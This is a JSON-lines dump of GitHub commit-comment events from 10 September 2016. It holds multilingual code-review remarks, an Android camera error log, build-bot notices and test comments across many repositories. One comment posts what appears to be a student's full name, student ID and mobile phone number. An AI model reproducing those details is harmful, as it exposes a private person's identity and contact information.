{"id":"4543851763","type":"CommitCommentEvent","actor":{"login":"ringomenoko"},"repo":{"name":"ringomenoko/my_reasearch"},"payload":{"comment":{"id":18973282,"position":195,"line":259,"path":"src/photo_dl/photo_dl.py","commit_id":"82a7c2ecc0db0ff09b5859e430d059698741c94c","created_at":"2016-09-10T10:37:44Z","updated_at":"2016-09-10T10:37:44Z","body":"configで指定していたの保存先とDBから取得したディレクトリ名（サイズのラベル）が一致していなかったのが主な原因。"}},"created_at":"2016-09-10T10:37:44Z"}
{"id":"4543852448","type":"CommitCommentEvent","actor":{"login":"ringomenoko"},"repo":{"name":"ringomenoko/my_reasearch"},"payload":{"comment":{"id":18973283,"position":226,"line":294,"path":"src/photo_dl/photo_dl.py","commit_id":"82a7c2ecc0db0ff09b5859e430d059698741c94c","created_at":"2016-09-10T10:38:20Z","updated_at":"2016-09-10T10:38:20Z","body":"エラー文を表示する方法はコレがよさげ"}},"created_at":"2016-09-10T10:38:20Z"}
{"id":"4543853482","type":"CommitCommentEvent","actor":{"login":"frank-dittrich"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18973284,"position":10,"line":160,"path":"src/as400_ssha1_fmt_plug.c","commit_id":"9037a834bc70417318d021426234179c6d49d292","created_at":"2016-09-10T10:39:16Z","updated_at":"2016-09-10T10:39:16Z","body":"Are you sure that `#ifdef HAVE_FUZZ` ... `#endif' block is still needed?\r\nvalid() returning 0 should be OK even when using `./john --fuzz`. "}},"created_at":"2016-09-10T10:39:16Z"}
{"id":"4543853908","type":"CommitCommentEvent","actor":{"login":"wakaber"},"repo":{"name":"nitrogen-os-devices/android_vendor_lge_hammerhead"},"payload":{"comment":{"id":18973285,"position":null,"line":null,"path":null,"commit_id":"d7a5ed70db5628c780d3dd14181b0e70451003e6","created_at":"2016-09-10T10:39:39Z","updated_at":"2016-09-10T10:39:39Z","body":"Зеленые мерцания также осталис.\r\n\r\n``` E mm-camera: module_faceproc_port_event_func:886] MCT_EVENT_MODULE_BUF_DIVERT 65538, Cannot start FD, active 10003, frameid 379 291, native 1, mapped 1 1\r\n E BufferQueueProducer: [SurfaceView - com.google.android.GoogleCamera/com.android.camera.CameraLauncher] queueBuffer: BufferQueue has been abandoned\r\n E mm-camera: module_faceproc_port_event_func:886] MCT_EVENT_MODULE_BUF_DIVERT 65538, Cannot start FD, active 10003, frameid 380 291, native 1, mapped 1 1\r\n E BufferQueueProducer: [SurfaceView - com.google.android.GoogleCamera/com.android.camera.CameraLauncher] queueBuffer: BufferQueue has been abandoned\r\n E mm-camera: module_faceproc_port_event_func:886] MCT_EVENT_MODULE_BUF_DIVERT 65538, Cannot start FD, active 10003, frameid 381 291, native 1, mapped 1 1\r\n E BufferQueueProducer: [SurfaceView - com.google.android.GoogleCamera/com.android.camera.CameraLauncher] queueBuffer: BufferQueue has been abandoned\r\n E mm-camera-intf: mm_camera_poll_thread_del_poll_fd: invalid handler 4608 (0)\r\n E mm-camera-intf: mm_camera_poll_thread_del_poll_fd: invalid handler 5120 (0)\r\n E mm-camera-intf: mm_camera_poll_thread_del_poll_fd: invalid handler 5632 (0)\r\n E mm-camera: isp_unlink_sink_port: E\r\n E QCamera3Channel: virtual qcamera::QCamera3Channel::~QCamera3Channel(): deleting channel 4353\r\n E mm-camera: isp_unlink_sink_port: E\r\n E mm-camera-img: faceproc_save_album:774] Error No album \r\n E mm-camera-img: faceproc_comp_eng_destroy: Album save failed -1\r\n E QCamera3Channel: virtual qcamera::QCamera3Channel::~QCamera3Channel(): deleting channel 4866\r\n E QCamera3Channel: virtual int32_t qcamera::QCamera3PicChannel::stop(): Attempt to stop inactive channel\r\n E mm-camera: isp_unlink_sink_port: E\r\n E QCamera3Channel: virtual qcamera::QCamera3Channel::~QCamera3Channel(): deleting channel 5379\r\n E QCamera3Channel: virtual qcamera::QCamera3Channel::~QCamera3Channel(): deleting channel 3840\r\n E mm-camera: mct_pipeline_get_stream: no children\r\n E mm-camera: mct_pipeline_process_set:1451: Couldn't find stream\r\n E mm-camera: Failed to open sensor1 port\r\n E mm-camera-intf: mm_stream_get_v4l2_fmt: Unknown fmt=78\r\n E mm-camera: mct_pipeline_get_stream: stream not found in the list\r\n E mm-camera-img: Face Album FILE EXISTS\r\n E mm-camera: cpp_module_process_downstream_event:1067, Update buf queue: APPEND\r\n E mm-camera: port_isp_mct_ctrl_cmd: error in isp_update_buf_info, identity = 0x10002\r\n E mm-camera: port_ispif_proc_mct_ctrl_cmd: forward_event error\r\n E mm-camera-sensor: port_sensor_port_process_event:1520 failed\r\n E mm-camera-sensor: module_sensor_module_process_event:2335 failed\r\n E mm-camera: cpp_module_process_downstream_event:1067, Update buf queue: APPEND\r\n E mm-camera: port_isp_mct_ctrl_cmd: error in isp_update_buf_info, identity = 0x10002\r\n E mm-camera: port_ispif_proc_mct_ctrl_cmd: forward_event error\r\n E mm-camera-sensor: port_sensor_port_process_event:1520 failed\r\n E mm-camera-sensor: module_sensor_module_process_event:2335 failed\r\n E mm-camera: cpp_module_process_downstream_event:1067, Update buf queue: APPEND\r\n E mm-camera: port_isp_mct_ctrl_cmd: error in isp_update_buf_info, identity = 0x10002\r\n E mm-camera: port_ispif_proc_mct_ctrl_cmd: forward_event error\r\n E mm-camera-sensor: port_sensor_port_process_event:1520 failed\r\n E mm-camera-sensor: module_sensor_module_process_event:2335 failed\r\n E mm-camera: cpp_module_process_downstream_event:1067, Update buf queue: APPEND\r\n E mm-camera: port_isp_mct_ctrl_cmd: error in isp_update_buf_info, identity = 0x10002\r\n E mm-camera: port_ispif_proc_mct_ctrl_cmd: forward_event error\r\n E mm-camera-sensor: port_sensor_port_process_event:1520 failed\r\n E mm-camera-sensor: module_sensor_module_process_event:2335 failed\r\n E mm-camera: cpp_module_process_downstream_event:1067, Update buf queue: APPEND\r\n E mm-camera: port_isp_mct_ctrl_cmd: error in isp_update_buf_info, identity = 0x10002\r\n E mm-camera: port_ispif_proc_mct_ctrl_cmd: forward_event error\r\n E mm-camera-sensor: port_sensor_port_process_event:1520 failed\r\n E mm-camera-sensor: module_sensor_module_process_event:2335 failed\r\n E mm-camera: cpp_module_process_downstream_event:1067, Update buf queue: APPEND\r\n E mm-camera: port_isp_mct_ctrl_cmd: error in isp_update_buf_info, identity = 0x10002\r\n E mm-camera: port_ispif_proc_mct_ctrl_cmd: forward_event error\r\n E mm-camera-sensor: port_sensor_port_process_event:1520 failed```"}},"created_at":"2016-09-10T10:39:39Z"}
{"id":"4543854998","type":"CommitCommentEvent","actor":{"login":"magnars"},"repo":{"name":"kodemaker/kodemaker.no"},"payload":{"comment":{"id":18973286,"position":null,"line":null,"path":null,"commit_id":"79ba9ca834525acb0345608abb9bb45ef859048e","created_at":"2016-09-10T10:40:33Z","updated_at":"2016-09-10T10:40:33Z","body":"👍 😄 "}},"created_at":"2016-09-10T10:40:33Z"}
{"id":"4543855380","type":"CommitCommentEvent","actor":{"login":"peti"},"repo":{"name":"NixOS/cabal2nix"},"payload":{"comment":{"id":18973288,"position":null,"line":null,"path":null,"commit_id":"22311078120b9531c9185328fecb130824d1ddc9","created_at":"2016-09-10T10:40:54Z","updated_at":"2016-09-10T10:40:54Z","body":"@mdorman, I have a silly question. If all these builds depend on `gobjectIntrospection`, why can `cabal2nix` not infer this dependency from their Cabal files? Is that a Nix-specific issue? Or is that dependency just missing from the Cabal files?"}},"created_at":"2016-09-10T10:40:54Z"}
{"id":"4543859443","type":"CommitCommentEvent","actor":{"login":"frank-dittrich"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18973294,"position":13,"line":163,"path":"src/as400_ssha1_fmt_plug.c","commit_id":"9037a834bc70417318d021426234179c6d49d292","created_at":"2016-09-10T10:44:23Z","updated_at":"2016-09-10T10:44:23Z","body":"the `error_shown = 1;` only needs to be processed if `!error_shown`."}},"created_at":"2016-09-10T10:44:23Z"}
{"id":"4543860121","type":"CommitCommentEvent","actor":{"login":"2359574928"},"repo":{"name":"2359574928/HelloWorld"},"payload":{"comment":{"id":18973295,"position":null,"line":null,"path":null,"commit_id":"740ebc2f998ef637719dd7627c08489da5efca2f","created_at":"2016-09-10T10:44:59Z","updated_at":"2016-09-10T10:44:59Z","body":"撒大声地"}},"created_at":"2016-09-10T10:44:59Z"}
{"id":"4543860378","type":"CommitCommentEvent","actor":{"login":"KristofferC"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18973296,"position":null,"line":null,"path":null,"commit_id":"843e0fea2549add6a7d1d6c752c5906691d601d6","created_at":"2016-09-10T10:45:12Z","updated_at":"2016-09-10T10:45:12Z","body":"It was interesting with the information I had available at the time. :)"}},"created_at":"2016-09-10T10:45:12Z"}
{"id":"4543860486","type":"CommitCommentEvent","actor":{"login":"2359574928"},"repo":{"name":"2359574928/HelloWorld"},"payload":{"comment":{"id":18973297,"position":null,"line":null,"path":null,"commit_id":"740ebc2f998ef637719dd7627c08489da5efca2f","created_at":"2016-09-10T10:45:15Z","updated_at":"2016-09-10T10:45:15Z","body":"测试\r\n"}},"created_at":"2016-09-10T10:45:15Z"}
{"id":"4543860904","type":"CommitCommentEvent","actor":{"login":"2359574928"},"repo":{"name":"2359574928/HelloWorld"},"payload":{"comment":{"id":18973298,"position":null,"line":null,"path":null,"commit_id":"740ebc2f998ef637719dd7627c08489da5efca2f","created_at":"2016-09-10T10:45:35Z","updated_at":"2016-09-10T10:45:35Z","body":"测试"}},"created_at":"2016-09-10T10:45:35Z"}
{"id":"4543861389","type":"CommitCommentEvent","actor":{"login":"jacquelineshadforth"},"repo":{"name":"twlevelup/melb_2016s2_watch_blue"},"payload":{"comment":{"id":18973299,"position":null,"line":null,"path":null,"commit_id":"7d196b32d42209de2447320e3e2552e311d306b0","created_at":"2016-09-10T10:46:07Z","updated_at":"2016-09-10T10:46:07Z","body":"Nice. 😉 "}},"created_at":"2016-09-10T10:46:07Z"}
{"id":"4543861891","type":"CommitCommentEvent","actor":{"login":"inorichi"},"repo":{"name":"TachiWeb/tachiyomi"},"payload":{"comment":{"id":18973300,"position":91,"line":118,"path":"app/src/main/java/eu/kanade/tachiyomi/ui/library/sync/LibrarySyncPresenter.kt","commit_id":"de26e35ab9bd7b46a0d463029b5ac8e61d335bbe","created_at":"2016-09-10T10:46:31Z","updated_at":"2016-09-10T10:46:31Z","body":"`Observable.fromCallable`\r\n\r\n`create` is too unsafe. You have to always check if the subscriber is unsubscribed before emitting anything, and it will lead to problems/crashes."}},"created_at":"2016-09-10T10:46:31Z"}
{"id":"4543863524","type":"CommitCommentEvent","actor":{"login":"frank-dittrich"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18973301,"position":10,"line":160,"path":"src/as400_ssha1_fmt_plug.c","commit_id":"9037a834bc70417318d021426234179c6d49d292","created_at":"2016-09-10T10:47:54Z","updated_at":"2016-09-10T10:47:54Z","body":"And the `options.flags & FLG_FUZZ_DUMP_CHK` part is definitely wrong.\r\nValid() behaving differently when `./john --fuzz-dump` just generates files with fuzzed data, to be processed later in a \"regular\" john run, is a bad idea.  "}},"created_at":"2016-09-10T10:47:54Z"}
{"id":"4543865808","type":"CommitCommentEvent","actor":{"login":"noldor"},"repo":{"name":"codeigniter-jp/codeigniter-jp.github.io"},"payload":{"comment":{"id":18973304,"position":null,"line":null,"path":null,"commit_id":"4e94e778cf9095885d50751517adfc6800ff5923","created_at":"2016-09-10T10:49:58Z","updated_at":"2016-09-10T10:49:58Z","body":"2系と3系を「バージョンが違う同一製品」と見るか、「メジャーバージョンが違う別製品」と見るか、で意見が変わりそうです。\r\n私は後者で考えています。管理者が変わりましたしsession周りなどいろんな部分で別物ですので。\r\n\r\nそのうえで、「3系と2系を混合して、動かないと相談を受けること多々」は実害ですね。\r\nインデックスから消したいというのは劇薬と思いますが、実害出ているならやむを得ないのかなとも思います\r\n（既存案件の保守を考えるとやりすぎ感あるのですが、既存案件ならURL控えているはずなので検索インデックスは重要度低い）。\r\n\r\nであれば、canonicalではなくてnoindex使ってはどうでしょうか。確実に消せます。\r\ngoogleは明らかに間違ったcanonical指定を無視するよう努力しているらしいですので。\r\n\r\n3系のSEOが弱いのは、そもそも公式サイトに掲載されたのが昨日ですからどうしようもなく、しばらく待つほかないかと思います。\r\n2系のページに3系へのリンクを張っていただいたたことで2系3系の区別と3系への誘導は行われているので、canonical使わずとも、これもまた効果が表れたかしばらく待つところと思います。\r\n（2系ページの3系へのリンクはありがとうございます！　ほしかったものです）"}},"created_at":"2016-09-10T10:49:58Z"}
{"id":"4543865942","type":"CommitCommentEvent","actor":{"login":"lxEvolution"},"repo":{"name":"lxEvolution/computationalphysics_N2014301020071"},"payload":{"comment":{"id":18973305,"position":null,"line":null,"path":null,"commit_id":"745268ed14b3b6802f3351287c33f876bd044aab","created_at":"2016-09-10T10:50:08Z","updated_at":"2016-09-10T10:50:08Z","body":"**# Personal Information**\r\n### name: ## 刘轩\r\n###student ID:##2014301020071\r\n###TEL:##13886966683"}},"created_at":"2016-09-10T10:50:08Z"}
{"id":"4543866575","type":"CommitCommentEvent","actor":{"login":"iraycd"},"repo":{"name":"iraycd/react-native-unified-contacts"},"payload":{"comment":{"id":18973306,"position":13,"line":397,"path":"RNUnifiedContacts/RNUnifiedContacts.swift","commit_id":"5e3d986d568d4ebfe44f03656c23dd45e5064d9d","created_at":"2016-09-10T10:50:35Z","updated_at":"2016-09-10T10:50:35Z","body":"My Xcode has been showing errors. I am using Xcode 8."}},"created_at":"2016-09-10T10:50:35Z"}
{"id":"4543866649","type":"CommitCommentEvent","actor":{"login":"iraycd"},"repo":{"name":"iraycd/react-native-unified-contacts"},"payload":{"comment":{"id":18973307,"position":22,"line":416,"path":"RNUnifiedContacts/RNUnifiedContacts.swift","commit_id":"5e3d986d568d4ebfe44f03656c23dd45e5064d9d","created_at":"2016-09-10T10:50:40Z","updated_at":"2016-09-10T10:50:40Z","body":"My Xcode has been showing errors. I am using Xcode 8."}},"created_at":"2016-09-10T10:50:40Z"}
{"id":"4543874439","type":"CommitCommentEvent","actor":{"login":"octoploid"},"repo":{"name":"facebook/zstd"},"payload":{"comment":{"id":18973313,"position":27,"line":179,"path":"contrib/pzstd/Options.cpp","commit_id":"4c202815c71a18d47a83f1f0109fe1d9b77debb6","created_at":"2016-09-10T10:58:00Z","updated_at":"2016-09-10T10:58:00Z","body":"I sometimes work on a machine where std::thread::hardware_concurrency() is 160...\r\nSo perhaps limiting the number to something like 8 would be better? "}},"created_at":"2016-09-10T10:58:00Z"}
{"id":"4543876454","type":"CommitCommentEvent","actor":{"login":"mrexodia"},"repo":{"name":"torusrxxx/x64dbg"},"payload":{"comment":{"id":18973315,"position":42,"line":60,"path":"src/gui/Src/BasicView/LabeledSplitter.cpp","commit_id":"9679452c0c0baefc98154dfae3190ab93b5d195f","created_at":"2016-09-10T10:59:52Z","updated_at":"2016-09-10T10:59:52Z","body":"When I use 'Detach' in the context menu it crashes like usual, when opening in Visual Studio 2013 with JIT this location pops up."}},"created_at":"2016-09-10T10:59:52Z"}
{"id":"4543876779","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":18973316,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-10T11:00:09Z","updated_at":"2016-09-10T11:00:09Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.163](http://build.clear-measure.com/viewLog.html?buildId=10405&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) is now running\n"}},"created_at":"2016-09-10T11:00:09Z"}
{"id":"4543878643","type":"CommitCommentEvent","actor":{"login":"stephankeel"},"repo":{"name":"stephankeel/git-playground"},"payload":{"comment":{"id":18973319,"position":null,"line":null,"path":null,"commit_id":"84d23dc2c8500a9a9966e066ba4a3baf91a62d23","created_at":"2016-09-10T11:01:32Z","updated_at":"2016-09-10T11:01:32Z","body":"initial"}},"created_at":"2016-09-10T11:01:32Z"}
{"id":"4543879383","type":"CommitCommentEvent","actor":{"login":"sintsov"},"repo":{"name":"SGolenzovskiy/altrc"},"payload":{"comment":{"id":18973320,"position":15,"line":36,"path":"public/js/app.js","commit_id":"32db5af63c2af5adf0890efe972fb8662bd4e57e","created_at":"2016-09-10T11:02:10Z","updated_at":"2016-09-10T11:02:10Z","body":"тут в целом мне сам подход не нравиться, лучше всякие элементы html если есть такая возможность размещать в теле страницы, как минимум так проще потом в коде найти такой блок. Что это означает в текущем случае:\r\n\r\nу тебя есть некий элемент с id=request ты ему так и так делаешь удаление класса hidden чтобы он отобразился, имело смысл сразу же в этот блок вставить свой код, было бы примерно так\r\n\r\n```\r\n<div id=\"request\" class=\"hidden well well-sm\">\r\n   <a href=\"/\">Сбросить фильтр:</a>\r\n</div>\r\n```\r\n\r\nно тебе надо куда то добавлять значение запроса (request)\r\nтогда можно было бы добавить\r\n```\r\n<div id=\"request\" class=\"hidden well well-sm\">\r\n   <a href=\"/\">Сбросить фильтр:</a>\r\n   <span id=\"request-result\"></span>\r\n</div>\r\n```\r\nв итоге тебе надо было бы удалить также класс hidden и в спан добавить результат выборки.\r\nВ таком подходе есть еще плюс, ты можешь потом для этого спана задавать отдельный стиль и менять его отображение, например сделать шрифт 20пкс"}},"created_at":"2016-09-10T11:02:10Z"}
{"id":"4543879635","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":18973321,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-10T11:02:21Z","updated_at":"2016-09-10T11:02:21Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.163](http://build.clear-measure.com/viewLog.html?buildId=10405&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 72, ignored: 2 Build time: 00:02:11"}},"created_at":"2016-09-10T11:02:21Z"}
{"id":"4543879995","type":"CommitCommentEvent","actor":{"login":"inorichi"},"repo":{"name":"TachiWeb/tachiyomi"},"payload":{"comment":{"id":18973322,"position":73,"line":105,"path":"app/src/main/java/eu/kanade/tachiyomi/ui/library/sync/LibrarySyncPresenter.kt","commit_id":"de26e35ab9bd7b46a0d463029b5ac8e61d335bbe","created_at":"2016-09-10T11:02:36Z","updated_at":"2016-09-10T11:02:36Z","body":"use `when` with sealed classes so that there's no need for an else clause.\r\n\r\n```\r\nwhen (result) {\r\n    is SyncResult.Progress -> {  ... }\r\n    is SyncResult.Completed -> { ... }\r\n    is SyncResult.... -> { ... }\r\n}"}},"created_at":"2016-09-10T11:02:36Z"}
{"id":"4543882425","type":"CommitCommentEvent","actor":{"login":"rickyc"},"repo":{"name":"lebra770/Nano-Hackers-Fall-Api-2016"},"payload":{"comment":{"id":18973323,"position":18,"line":18,"path":"fizzbuzz.html","commit_id":"6607bfa52c850fbc81539a5b346e5a7b2deb6751","created_at":"2016-09-10T11:04:22Z","updated_at":"2016-09-10T11:04:22Z","body":"👍 I never knew you could use a comma instead of `&&`"}},"created_at":"2016-09-10T11:04:22Z"}
{"id":"4543882720","type":"CommitCommentEvent","actor":{"login":"nabijaczleweli"},"repo":{"name":"facebook/zstd"},"payload":{"comment":{"id":18973325,"position":27,"line":179,"path":"contrib/pzstd/Options.cpp","commit_id":"4c202815c71a18d47a83f1f0109fe1d9b77debb6","created_at":"2016-09-10T11:04:33Z","updated_at":"2016-09-10T11:04:33Z","body":"`8` for a limit is a little low, but then again, you shouldn't be using `hardware_concurrency()`, since\r\n>The value should be considered only a hint. "}},"created_at":"2016-09-10T11:04:33Z"}
{"id":"4543883997","type":"CommitCommentEvent","actor":{"login":"BCStudio"},"repo":{"name":"BCStudio/bcstudio.github.io"},"payload":{"comment":{"id":18973328,"position":null,"line":null,"path":null,"commit_id":"06727ddf8212904615ccf602035f497bd457ff17","created_at":"2016-09-10T11:05:34Z","updated_at":"2016-09-10T11:05:34Z","body":"making bugs"}},"created_at":"2016-09-10T11:05:34Z"}
{"id":"4543884024","type":"CommitCommentEvent","actor":{"login":"inorichi"},"repo":{"name":"TachiWeb/tachiyomi"},"payload":{"comment":{"id":18973329,"position":42,"line":75,"path":"app/src/main/java/eu/kanade/tachiyomi/ui/library/sync/LibrarySyncPresenter.kt","commit_id":"de26e35ab9bd7b46a0d463029b5ac8e61d335bbe","created_at":"2016-09-10T11:05:36Z","updated_at":"2016-09-10T11:05:36Z","body":"Here I would use something like:\r\n```\r\nval obs1 = Observable.just(LibrarySyncProgressEvent.ProgressUpdated(context.getString(R.string.saving_changes))`\r\nval obs2 = Observable.fromCallable {\r\n    db.inTransaction { ... }\r\n    LibrarySyncProgressEvent.Completed(result.conflicts)\r\n}\r\nObservable.merge(obs1, obs2)"}},"created_at":"2016-09-10T11:05:36Z"}
{"id":"4543885893","type":"CommitCommentEvent","actor":{"login":"AvManikanta"},"repo":{"name":"AvManikanta/Projects"},"payload":{"comment":{"id":18973332,"position":null,"line":null,"path":null,"commit_id":"5271473793399f3702afb34d4a7e17b1347d2757","created_at":"2016-09-10T11:07:09Z","updated_at":"2016-09-10T11:07:09Z","body":"\r\n\r\n\r\n[Code.pdf](https://github.com/AvManikanta/Projects/files/465375/Code.pdf)\r\n"}},"created_at":"2016-09-10T11:07:09Z"}
{"id":"4543887525","type":"CommitCommentEvent","actor":{"login":"dangyao"},"repo":{"name":"dangyao/PallaraxListView"},"payload":{"comment":{"id":18973334,"position":null,"line":null,"path":null,"commit_id":"e4299d37e4b993d6b1dfd8a11831f52b4a56ecda","created_at":"2016-09-10T11:08:29Z","updated_at":"2016-09-10T11:08:29Z","body":"自定义UI框架，实现QQ5.0特效"}},"created_at":"2016-09-10T11:08:29Z"}
{"id":"4543889392","type":"CommitCommentEvent","actor":{"login":"rdlabo"},"repo":{"name":"codeigniter-jp/codeigniter-jp.github.io"},"payload":{"comment":{"id":18973337,"position":null,"line":null,"path":null,"commit_id":"4e94e778cf9095885d50751517adfc6800ff5923","created_at":"2016-09-10T11:10:10Z","updated_at":"2016-09-10T11:10:10Z","body":"> noldorさん\r\nこちら、コメントありがとうございます。メジャーバージョンが違うけど前バージョンは非推奨な製品、をどう取り扱うか、はありますよね。\r\n　\r\nとは別としまして、noindexに変更するのは、確かにおっしゃるとおりかと思いますー！こちら、どこかで時間みつけて作業するようにいたしますので、よろしくお願い申し上げますー！"}},"created_at":"2016-09-10T11:10:10Z"}
{"id":"4543890511","type":"CommitCommentEvent","actor":{"login":"NEKOGET"},"repo":{"name":"codeigniter-jp/codeigniter-jp.github.io"},"payload":{"comment":{"id":18973339,"position":null,"line":null,"path":null,"commit_id":"4e94e778cf9095885d50751517adfc6800ff5923","created_at":"2016-09-10T11:11:05Z","updated_at":"2016-09-10T11:11:05Z","body":"codeigniter.jpから2系ユーザガイドへのリンクもありますし、noindexで良いに賛成です。\r\n"}},"created_at":"2016-09-10T11:11:05Z"}
{"id":"4543891197","type":"CommitCommentEvent","actor":{"login":"skyp999"},"repo":{"name":"lightmix/galaxycoin-1"},"payload":{"comment":{"id":18973341,"position":null,"line":null,"path":null,"commit_id":"8f305e47d44b75cfb72237a1935acf04aebb940b","created_at":"2016-09-10T11:11:41Z","updated_at":"2016-09-10T11:11:41Z","body":"CeCe-blighter"}},"created_at":"2016-09-10T11:11:41Z"}
{"id":"4543894431","type":"CommitCommentEvent","actor":{"login":"nononoy"},"repo":{"name":"iStat24/amorail"},"payload":{"comment":{"id":18973343,"position":null,"line":null,"path":null,"commit_id":"a60770ab5da5eb14fb8ad0dd76f0945f9c131deb","created_at":"2016-09-10T11:14:28Z","updated_at":"2016-09-10T11:14:28Z","body":"Well done. I think I could accept your pull request if you make it. :+1: "}},"created_at":"2016-09-10T11:14:28Z"}
{"id":"4543894760","type":"CommitCommentEvent","actor":{"login":"mamehaze"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":18973344,"position":null,"line":null,"path":null,"commit_id":"5779e69dbdcbfb8666dc9b33d0714784654faa02","created_at":"2016-09-10T11:14:46Z","updated_at":"2016-09-10T11:14:46Z","body":"is this really the right way to fix this problem?\r\n\r\nI thought we intentionally used the same name in software lists for things that were ports.\r\n\r\nIf the logic is breaking elsewhere then it probably needs fixing there rather than sets being renamed?  If it's some kind of rom manager issue it's none of our concern."}},"created_at":"2016-09-10T11:14:46Z"}
{"id":"4543897218","type":"CommitCommentEvent","actor":{"login":"vasukki"},"repo":{"name":"vasukki/hello-world"},"payload":{"comment":{"id":18973347,"position":null,"line":null,"path":null,"commit_id":"9c94e7beccf9f3bd27a579ecc3bfa9287a43223c","created_at":"2016-09-10T11:16:57Z","updated_at":"2016-09-10T11:16:57Z","body":"hai"}},"created_at":"2016-09-10T11:16:57Z"}
{"id":"4543897590","type":"CommitCommentEvent","actor":{"login":"yamgent"},"repo":{"name":"INCENDE/rcs"},"payload":{"comment":{"id":18973348,"position":null,"line":null,"path":null,"commit_id":"55163e1c0eccf814e9af199afd751c10b72f890a","created_at":"2016-09-10T11:17:15Z","updated_at":"2016-09-10T11:17:15Z","body":"Bro you forgot the \"W11-\" prefix."}},"created_at":"2016-09-10T11:17:15Z"}
{"id":"4543897794","type":"CommitCommentEvent","actor":{"login":"Kojoley"},"repo":{"name":"boostorg/config"},"payload":{"comment":{"id":18973349,"position":5,"line":628,"path":"include/boost/config/suffix.hpp","commit_id":"830192fc350cc64d8360547865fc32e6a0026980","created_at":"2016-09-10T11:17:27Z","updated_at":"2016-09-10T11:17:27Z","body":"`BOOST_NO_NORETURN` will no be defined if `__has_cpp_attribute(noreturn)` is false"}},"created_at":"2016-09-10T11:17:27Z"}
{"id":"4543897946","type":"CommitCommentEvent","actor":{"login":"wangchao7109"},"repo":{"name":"wangchao7109/Demo"},"payload":{"comment":{"id":18973350,"position":4,"line":6,"path":"src/Main.java","commit_id":"f8480a5151de6b28f798a840d3f950b4cca5e478","created_at":"2016-09-10T11:17:36Z","updated_at":"2016-09-10T11:17:36Z","body":"System.out.print(99999);"}},"created_at":"2016-09-10T11:17:36Z"}
{"id":"4543898453","type":"CommitCommentEvent","actor":{"login":"wangchao7109"},"repo":{"name":"wangchao7109/Demo"},"payload":{"comment":{"id":18973351,"position":null,"line":null,"path":null,"commit_id":"f8480a5151de6b28f798a840d3f950b4cca5e478","created_at":"2016-09-10T11:18:02Z","updated_at":"2016-09-10T11:18:02Z","body":"eeeeee"}},"created_at":"2016-09-10T11:18:02Z"}
{"id":"4543898684","type":"CommitCommentEvent","actor":{"login":"wangchao7109"},"repo":{"name":"wangchao7109/Demo"},"payload":{"comment":{"id":18973352,"position":4,"line":6,"path":"src/Main.java","commit_id":"f8480a5151de6b28f798a840d3f950b4cca5e478","created_at":"2016-09-10T11:18:13Z","updated_at":"2016-09-10T11:18:13Z","body":"rrrrrr"}},"created_at":"2016-09-10T11:18:13Z"}
{"id":"4543898964","type":"CommitCommentEvent","actor":{"login":"01micko"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18973353,"position":null,"line":null,"path":null,"commit_id":"3ff6f13363a4062e851f3b6b4e7a056f65b148e7","created_at":"2016-09-10T11:18:28Z","updated_at":"2016-09-10T11:18:28Z","body":"This errored out on me when the local firmware repo was up to date. Adding `return 0` seemed to fix it. It can't hurt anyway. "}},"created_at":"2016-09-10T11:18:28Z"}
{"id":"4543899505","type":"CommitCommentEvent","actor":{"login":"Blaisorblade"},"repo":{"name":"farkam135/GoIV"},"payload":{"comment":{"id":18973355,"position":null,"line":null,"path":null,"commit_id":"f476723739a2bce1f96c18eda78bad6c16b21b7c","created_at":"2016-09-10T11:18:59Z","updated_at":"2016-09-10T11:18:59Z","body":"That's the kind of questions I leave to you ;-), though I also thought of avoiding `wrap_content`."}},"created_at":"2016-09-10T11:18:59Z"}
{"id":"4543900522","type":"CommitCommentEvent","actor":{"login":"mrexodia"},"repo":{"name":"torusrxxx/x64dbg"},"payload":{"comment":{"id":18973356,"position":42,"line":60,"path":"src/gui/Src/BasicView/LabeledSplitter.cpp","commit_id":"9679452c0c0baefc98154dfae3190ab93b5d195f","created_at":"2016-09-10T11:19:55Z","updated_at":"2016-09-10T11:19:55Z","body":"When removing the crash dumper it will work."}},"created_at":"2016-09-10T11:19:55Z"}
{"id":"4543902843","type":"CommitCommentEvent","actor":{"login":"INCENDE"},"repo":{"name":"INCENDE/rcs"},"payload":{"comment":{"id":18973358,"position":null,"line":null,"path":null,"commit_id":"55163e1c0eccf814e9af199afd751c10b72f890a","created_at":"2016-09-10T11:21:46Z","updated_at":"2016-09-10T11:21:46Z","body":"LOL ok thanks. Question though is, why are you spying on my repository 😂 "}},"created_at":"2016-09-10T11:21:46Z"}
{"id":"4543904732","type":"CommitCommentEvent","actor":{"login":"hkoof"},"repo":{"name":"sitaramc/gitolite"},"payload":{"comment":{"id":18973363,"position":null,"line":null,"path":null,"commit_id":"eb3f12f4d024937084ef52aecff82c390a4fa9c1","created_at":"2016-09-10T11:23:30Z","updated_at":"2016-09-10T11:23:30Z","body":"s/# tolerate bare/tolerate non-bare/   ?"}},"created_at":"2016-09-10T11:23:30Z"}
{"id":"4543905152","type":"CommitCommentEvent","actor":{"login":"ShawnieBoy"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":18973364,"position":null,"line":null,"path":null,"commit_id":"b2a07da2a54a915ccc66d662f44aa69835b977f6","created_at":"2016-09-10T11:23:55Z","updated_at":"2016-09-10T11:23:55Z","body":"This should increase the language and crop support slightly, due to online-only sets not having either."}},"created_at":"2016-09-10T11:23:55Z"}
